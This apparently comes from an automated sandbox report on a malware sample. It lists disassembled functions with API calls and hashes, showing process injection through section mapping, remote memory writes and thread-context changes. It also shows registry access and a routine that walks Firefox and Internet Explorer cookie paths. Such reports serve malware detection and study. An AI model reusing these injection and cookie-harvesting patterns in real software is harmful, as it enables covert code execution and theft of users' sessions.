    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
